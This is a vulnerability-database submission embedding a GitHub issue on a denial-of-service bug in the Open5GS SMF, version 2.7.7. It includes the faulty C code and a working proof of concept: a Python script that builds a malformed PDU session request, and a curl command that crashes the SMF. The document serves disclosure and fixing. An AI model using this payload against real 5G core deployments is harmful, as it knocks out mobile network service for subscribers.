| 제목 | Open5gs SMF v2.7.7 Denial of Service |
|---|
| 설명 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
SMF crashes when a `PduSessionCreateData` request for
`POST /nsmf-pdusession/v1/pdu-sessions` omits `vcnTunnelInfo`.
In `smf_nsmf_handle_create_data_in_hsmf()`, the code intends to reject a
missing or incomplete `vcnTunnelInfo`, but its error log dereferences
`vcnTunnelInfo` even inside the `!vcnTunnelInfo` branch:
```c
vcnTunnelInfo = PduSessionCreateData->vcn_tunnel_info;
if (!vcnTunnelInfo ||
!(vcnTunnelInfo->ipv4_addr || vcnTunnelInfo->ipv6_addr) ||
!vcnTunnelInfo->gtp_teid) {
ogs_error("[%s:%d] No vcnTunnelInfo [%s:%s:%s]",
smf_ue->supi, sess->psi,
vcnTunnelInfo->ipv4_addr ? vcnTunnelInfo->ipv4_addr : "NULL",
vcnTunnelInfo->ipv6_addr ? vcnTunnelInfo->ipv6_addr : "NULL",
vcnTunnelInfo->gtp_teid ? vcnTunnelInfo->gtp_teid : "NULL");
```
So the intended validation path turns into an immediate null-pointer crash.
This issue is not a duplicate of the existing callback reports in
`report/smf/`; it affects a different SBI route and a different SMF business
procedure.
As a control, the same request with a valid `vcnTunnelInfo` did not crash the
SMF and instead returned a normal `400` error for the next missing mandatory
field (`No Max Integrity Protected Data`), confirming that the crash is tied to
the absent `vcnTunnelInfo`.
### Steps to reproduce
1. Ensure the Open5GS Docker lab is running and note the SMF IP:
```bash
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf
```
2. Build a minimal multipart request with valid earlier fields but no
`vcnTunnelInfo`:
```bash
python3 - <<'PY'
from pathlib import Path
import json
boundary = 'BOUNDARY123'
body = {
'supi': 'imsi-001011234567899',
'pduSessionId': 1,
'dnn': 'internet',
'sNssai': {'sst': 1},
'vsmfId': 'fake-vsmf',
'servingNetwork': {'mcc': '001', 'mnc': '01'},
'anType': '3GPP_ACCESS',
'ratType': 'NR',
'ueLocation': {'nrLocation': {
'tai': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'tac': '000001'},
'ncgi': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'nrCellId': '000000001'},
'ueLocationTimestamp': '2026-04-10T20:56:16Z'
}},
'amfNfId': 'fake-amf',
'guami': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'amfId': '000040'},
'n1SmInfoFromUe': {'contentId': '5gnas-sm'}
}
# Minimal UE-to-SM payload in the gsmue format accepted by this handler:
n1 = bytes.fromhex('c191a1')
parts = []
parts.append(
(f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode()) +
json.dumps(body, separators=(',', ':')).encode() + b'\r\n'
)
parts.append(
(f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n'
f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode()) +
n1 + b'\r\n'
)
parts.append(f'--{boundary}--\r\n'.encode())
Path('/tmp/pdu_create_missing_vcn.multipart').write_bytes(b''.join(parts))
PY
```
3. Send the request:
```bash
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.10/nsmf-pdusession/v1/pdu-sessions \
-H 'Content-Type: multipart/related; boundary=BOUNDARY123' \
--data-binary @/tmp/pdu_create_missing_vcn.multipart
```
4. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T20:56:16Z smf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T20:56:29.796110928Z
The process exited before emitting an application-level validation error for
this request.
```
### Expected behaviour
SMF should reject the malformed create request with a normal `400` error response.
### Observed Behaviour
The HTTP/2 stream is reset and the SMF process exits with code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| 원천 | ⚠️ https://github.com/open5gs/open5gs/issues/4446 |
|---|
| 사용자 | FrankLin (UID 97501) |
|---|
| 제출 | 2026. 04. 20. PM 09:19 (1 월 ago) |
|---|
| 모더레이션 | 2026. 05. 10. PM 04:40 (20 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 362549 [Open5GS 까지 2.7.7 SMF smf_nsmf_handle_create_data_in_hsmf 서비스 거부] |
|---|
| 포인트들 | 20 |
|---|